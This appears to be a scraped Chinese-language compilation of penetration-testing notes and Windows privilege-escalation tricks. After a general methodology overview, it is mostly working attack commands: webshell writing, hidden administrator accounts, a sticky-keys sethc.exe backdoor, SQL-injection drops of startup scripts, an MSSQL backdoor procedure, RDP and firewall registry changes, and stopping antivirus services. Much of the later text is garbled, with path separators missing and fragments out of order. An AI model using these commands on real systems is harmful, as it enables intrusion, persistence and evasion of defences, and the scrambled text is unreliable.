通过使用专门的漏洞利用工具和技术,渗透测试人员可以利用这些漏洞来获取对目标系统的访问权限。
6.无线网络渗透测试:无线网络通常存在安全风险,如未加密的Wi-Fi网络、弱密码等。
通过使用无线渗透测试工具,如Aircrack-ng、Reaver等,渗透测试人员可以检测和利用无线网络中的安全漏洞。
7.后门访问:一旦获取对目标系统的访问权限,渗透测试人员可以创建后门,以便在获得访问权限后能够持续地访问系统。
这可以包括在目标系统中安装木马、远程访问工具等。
8.覆盖轨迹:渗透测试人员应努力在测试结束后清除所有与渗透测试相关的痕迹。
这包括删除日志、清除访问记录、还原文件修改等。
使目标系统尽可能地回到测试之前的状态,以确保测试的完整性和机密性。
9.报告编写:渗透测试的最后一步是编写详细的报告,记录渗透测试的整个过程、发现的漏洞和建议的修复措施。
这份报告将提供给目标系统的所有者,以帮助他们改进系统的安全性。
总之,渗透测试是一项复杂而多样化的任务,需要综合运用各种技术和工具,以发现和利用目标系统中的安全漏洞。
网络安全渗透测试技巧与工具使用方法
网络安全渗透测试技巧与工具使用方法网络安全渗透测试是一种评估信息系统安全性的方法,通过模拟黑客攻击的方式检测系统中的漏洞并提供相应的解决方案。
为了更好地进行这种测试,渗透测试人员需要掌握一些技巧和工具的使用方法。
本文将介绍一些网络安全渗透测试的实用技巧和工具,帮助渗透测试人员提高工作效率和准确性。
一、信息收集技巧在进行渗透测试前,信息收集是非常重要的一步。
渗透测试人员需要收集目标系统的详细信息,包括IP地址、域名、操作系统、服务等。
以下是一些常见的信息收集技巧:1. Whois查询:通过Whois查询可以获取到域名的注册信息,了解域名的所有者和联系方式。
2. 端口扫描:使用工具如Nmap进行端口扫描,可以获取目标系统开放的端口。
根据端口的开放与关闭可以判断目标系统的服务和可能存在的漏洞。
3. 子域名收集:通过使用扫描工具如Sublist3r和DNSDumpster等可以获取目标网站的子域名列表,进一步了解目标系统的结构和可能存在的薄弱点。
4. 网络拓扑分析:通过使用工具如Nessus和OpenVAS等可以进行网络拓扑分析,获取目标系统中的主机和设备信息。
二、漏洞扫描技巧漏洞扫描是渗透测试中极为重要的一步。
通过使用漏洞扫描工具,渗透测试人员可以发现目标系统中存在的漏洞。
以下是一些常见的漏洞扫描技巧:1. 定期更新漏洞库:渗透测试人员需要定期更新漏洞库,以确保使用最新的漏洞信息进行扫描。
2. 筛选扫描目标:根据信息收集阶段的结果,渗透测试人员可以筛选出关键的IP地址和域名,优先对这些目标进行扫描。
3. 扫描策略选择:针对不同的目标系统和需求,渗透测试人员需要选择合适的扫描策略,如全面扫描或集中在特定的服务和漏洞进行扫描。
4. 增加扫描深度:渗透测试人员可以增加扫描深度,包括对未授权访问漏洞进行测试和进行敏感信息的泄露测试。
三、漏洞利用与渗透技巧当发现目标系统存在漏洞后,渗透测试人员需要利用这些漏洞获得对系统进行进一步渗透的权限。
渗透测试技巧
渗透测试技巧渗透测试技巧是指在安全授权的前提下,模拟黑客攻击者的方式来测试网络系统的安全性。
下面是一些常用的渗透测试技巧:1. 信息收集:在进行渗透测试之前,收集目标系统的相关信息,包括IP地址、域名、子域名、开放端口、网站结构、服务供应商等。
可以通过搜索引擎、Whois查询、域名解析等方式进行信息收集。
2. 漏洞扫描:使用自动化工具(如Nmap、OpenVAS等)扫描目标系统的漏洞,包括操作系统、应用程序等的漏洞。
通过漏洞扫描可以找到系统的弱点,以备利用。
3. 社会工程学:社会工程学是指通过与目标系统的用户或相关人员进行交流,获取信息或获得系统访问权限的技巧。
常见的社会工程技巧包括钓鱼邮件、电话欺骗、伪装身份等。
在渗透测试中,可以通过社会工程学技巧获取用户密码或其他敏感信息。
4. 密码破解:对于目标系统的登录账号,使用字典攻击、暴力破解等技术尝试获取正确的密码。
可以使用工具如Hydra、John the Ripper等来进行密码破解。
5. 漏洞利用:利用已知的漏洞或其它系统弱点,以获取目标系统的访问权限或执行任意代码。
常见的漏洞利用技术包括SQL注入、跨站脚本攻击(XSS)、远程代码执行等。
6. 提权:在成功获取目标系统的访问权限后,尝试提升权限,获取更高级别的访问权限。
可以使用本地提权漏洞或系统配置错误等方式进行提权。
7. 持久化访问:在渗透测试过程中,为了长期访问目标系统,可以在受控系统上安装后门或者其他持久化的访问方式。
这样即使目标系统发现并修复了漏洞,仍可以保持对目标系统的控制。
8. 渗透测试报告:在完成渗透测试后,撰写渗透测试报告,并将发现的漏洞以及建议的修复措施详细记录。
这样可以帮助目标系统更好地保护自身,并且是渗透测试过程的一个重要步骤。
Windows权限提升(一)
Windows权限提升(⼀)⼀.常见的提权⽅法1.溢出漏洞提权webshell能否提权成功,⼤多数在于中间件给的权限。
中间件主要提供给⽹站⼀个运⾏的载体,没有中间件⽹站是运⾏不起来的。
运维⼈员如果对⽹络安全⾮常熟悉,那他⼀定不会以root权限去安装中间件;如果是windows也⼀定不会以管理员账户去运⾏中间件,⼀定是以普通⽤户来运⾏中间件。
所以,我们把普通⽤户权限提升为管理员⽤户权限。
cmd命令⽆法执⾏的原因cmd命令执⾏原因:主要原因是cmd.exe被管理员降权或删除,也有可能组件被删除。
cmd命令执⾏解决⽅法:通过脚本⽊马查找可读可写⽬录,上传cmd,调⽤cmd路径执⾏命令(找可读可写⽬录不要选带空格⽬录,选⽤空格⽬录要⽤双引号引起来)。
⽤Windows2003来做实验给2003上传⼀个⽊马⽂件⽂件内容如图⽤中国菜⼑软件来连接把本机或2003⾥的cmd.exe上传到⼀个可读可写的⽂件⾥去菜⼑设置终端路径:setp c:\wmpub\cmd.exe(这个命令的意思为:把我们的终端设置为指定的cmd.exe)这个时候我们执⾏任何命令都是以这个cmd.exe来执⾏的,不是以利⽤操作系统的cmd.exe执⾏提升权限,输⼊命令 cacls "C:\wmpub" /t /p everyone:f(这条命令的意思是给C盘下的wmpub⽂件添加everyone的所有权限)因为菜⼑这⾥没有交互,所以⽆法使⽤Y键功能。
可以输⼊命令echo y|cacls "C:\wmpub" /t /p everyone:f来解决,从⽽实现Y键功能。
这时查看⽂件wmpub,就会发现已经添加了everyone权限这时我们菜⼑的终端⾥执⾏任何命令都可以提权常⽤命令whoami ——查看⽤户权限systeminfo ——查看操作系统,补丁情况ipconfig——查看当前服务器IP ipconfig /allnet user——查看当前⽤户情况netstat ——查看当前⽹络连接情况 netstat –ano /netstat –an | find “ESTABLISHED”tasklist ——查看当前进程情况 tasklist /svctaskkill ——结束进程 taskkill -PID xxnet start ——启动服务net stop ——停⽌服务举例添加⽤户名为best,密码为123456 输⼊命令 net user best 123456 /add我们创造的best⽤户为普通⽤户将⽤户名为best的⽤户添加到管理员组,输⼊命令net localgroup administrators best /add删除best⽤户,输⼊命令net user best /del溢出漏洞提权实战测试命令⾏下执⾏检测未打补丁的命令如下systeminfo>micropoor.txt&(for %i in ( KB977165 KB2160329 KB2503665 KB2592799 KB2707511 KB2829361 KB2850851 KB3000061 KB3045171 KB3077657 KB3079904 KB3134228 KB3143141 KB3141780 ) do @type micropoor.txt|@find /i "%i"|| @echo %i you can fuck)&del /f /q /a micropoor.txt根据漏洞编号查找⼯具举例:选择编号KB977165进⾏提权(由于权限过⾼,所以在菜⼑⾥看不出效果,所以在2003的cmd⾥建⼀个普通⽤户,再进⾏提权)在2003⾥建⽴⼀个普通⽤户,如图在这个⽬录下新建⼀个⽊马⽂件123.asp内容是添加iuse和写⼊权限⽤菜⼑连接⼀下这时,就输⼊ setp c:\wmpub\cmd.exe ,再添加⽤户上传pr.exe到⽂件wmpubpr中然后进⼊⽬录wmpub中,就可以执⾏命令 (例如:pr.exe whoami),说明提权成功。
- 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
- 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
- 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
REG ADD HKLMSYSTEMCurrentControlSetControlTerminal Server v fDenyTSConnections t REG_DWORD d 00000000 f
3.更改终端端口为2008(十六进制为:0x7d8):
Set z=o.create(test)
z.changePassword 123456,
z.setting(AccountType)=3
Cmd 访问控制权限控制:
命令如下:
cacls c e t g everyoneF #c盘everyone权限
cacls 目录 d everyone #everyone不可读,包括admin
End If
Next
3、iis_spy 列举(注:需要支持ASPX,反IISSPY的方法:将 activeds.dll,activeds.tlb 降权)。
4、得到目标站目录,不能直接跨的。可以通过“echo ^%execute(request(“cmd”))%^ X目标目录X.asp”或者“copy 脚本文件 X目标目录X.asp”像目标目录写入webshell,或者还可以试试type命令。
insert into a values (b=wshshell.run (cmd.exe c net localgroup administrators admin add,0));
select from a into outfile CDocuments and SettingsAll Users「开始」菜单程序启动a.vbs;
exec master.dbo.sp_addlogin test,123
EXEC sp_addsrvrolemember 'test, 'sysadmin'
然后在DOS下执行:cmd.exe c isql -E U alma
在删掉了 net.exe 和不用 adsi 之外,新的加用户的方法。代码如下:
b、内网环境(lcx.exe)
c、终端服务器超出了最大允许连接(XP 运行:mstsc admin;2003 运行:mstsc console)
1.查询终端端口:
REG query HKLMSYSTEMCurrentControlSetControlTerminal ServerWinStationsRDP-Tcp v PortNumber
Set VDirObj = OService.GetObject(IIsWebVirtualDir, ROOT)
If Err 0 Then WScript.Quit (1)
WScript.Echo Chr(10) & [ & OService.ServerComment & ]
For Each Binds In OService.ServerBindings
create table a (cmd text);
insert into a values (set wshshell=createobject (wscript.shell));
insert into a values (a=wshshell.run (cmd.exe c net user admin admin add,0));
net stop Symantec Event Manager y
net stop System Event Notification y
net stop Symantec Settings Manager y
麦咖啡:
net stop McAfee McShield
Symantec病毒日志
js
var o=new ActiveXObject( ers );
z=o.create(test) ;
z.changePassword(123456,)
z.setting(AccountType)=3;
vbs
view source
Set o=CreateObject( ers )
Windows渗透与提权技巧汇总
本文汇总了Windows渗透与提权的多个技巧,包含:MSSQL查询分析器连接记录清除、VNC与Radmin的提权方法、Cmd 下目录的操作技巧以及Webshell 提权小技巧等。
旁站路径问题:
1、读网站配置。
2、用以下VBS:
On Error Resume Next
del cwindowssystem32sethc.exe
copy cwindowsexplorer.exe cwindowssystem32sethc.exe
copy cwindowssystem32sethc.exe cwindowssystem32dllcachesethc.exe
If (LCase(Right(WScript.Fullname, 11)) = wscript.exe) Then
MsgBox Space(12) & IIS Virtual Web Viewer & Space(12) & Chr(13) & Space(9) & UsageCscript vWeb.vbs, 4096, Lilo
attrib cwindowssystem32sethc.exe +h +r +s
attrib cwindowssystem32dllcachesethc.exe +h +r +s
添加隐藏系统账号:
1、执行命令:“net user admin$ 123456 add&net localgroup administrators admin$ add”。
备注:
反制方法,在文件夹安全设置里将 Everyone 设定为不可读,如果没有安全性选项:工具 – 文件夹选项 – 使用简单的共享去掉即可。
3389 相关,以下配合PR更好:
a、防火墙TCPIP筛选.(关闭:net stop policyagent & net stop sharedaccess)
#地址池的范围是从192.168.3.1到192.168.3.254:
netsh ras ip add range from = 192.168.3.1 to = 192.168.3.254
Cmd、Dos 命令行下添加 SQL 用户的方法:
需要有管理员权限,在命令下先建立一个“ctest.qry”文件,内容如下:
Web = { & Replace(Binds, , } { ) & }
WScript.Echo Replace(Split(Replace(Web, , ), }{)(2), }, )
Next
WScript.Echo Path & VDirObj.Path
2、导出注册表SAM下用户的两个键值。
3、在用户管理界面里的 admin$ 删除,然后把备份的注册表导回去。
4、利用 Hacker Defender 把相关用户注册表隐藏。
安装 MSSQL 扩展后门:
USE master;
EXEC sp_addextendedproc 'xp_helpsystem', 'xp_helpsystem.dll';
REG ADD HKLMSYSTEMCurrentControlSetControlTerminal ServerWdsrdpwdTdstcp v PortNumber t REG_DWORD d 0x7d8 f
REG ADD HKLMSYSTEMCurrentControlSetControlTerminal ServerWinStationsRDP-Tcp v PortNumber t REG_DWORD d 0x7D8 f
WScript.Quit
End If
Set objservice = GetObject(IISLocalHostW3SVC)
For Each obj3w In objservice
If IsNumeric() Then
Set OService = GetObject(IISLocalHostW3SVC & )
copy %systemroot%system32cmd.exe %systemroot%system32sethc.exe y
替换SHIFT后门:
attrib cwindowssystem32sethc.exe -h -r -s
attrib cwindowssystem32dllcachesethc.exe -h -r -s
Nod32病毒备份
CDocume~1AdministratorLocal SettingsApplication DataESETESET NOD32 AntivirusQuarantine
Nod32移除密码保护
删除“HKEY_LOCAL_MACHINESOFTWAREESETESET SecurityCurrentVersionInfoPackageID”即可
4.取消xp&2003系统防火墙对终端服务的限制及IP连接的限制:
REG ADD HKLMSYSTEMCurrentControlSetServicesSharedAccessParametersFirewallPolicyStandardProfileGloballyOpenPortsList v 3389TCP t REG_SZ d 3389TCPEnabled @ xpsp2res.dll,-22009 f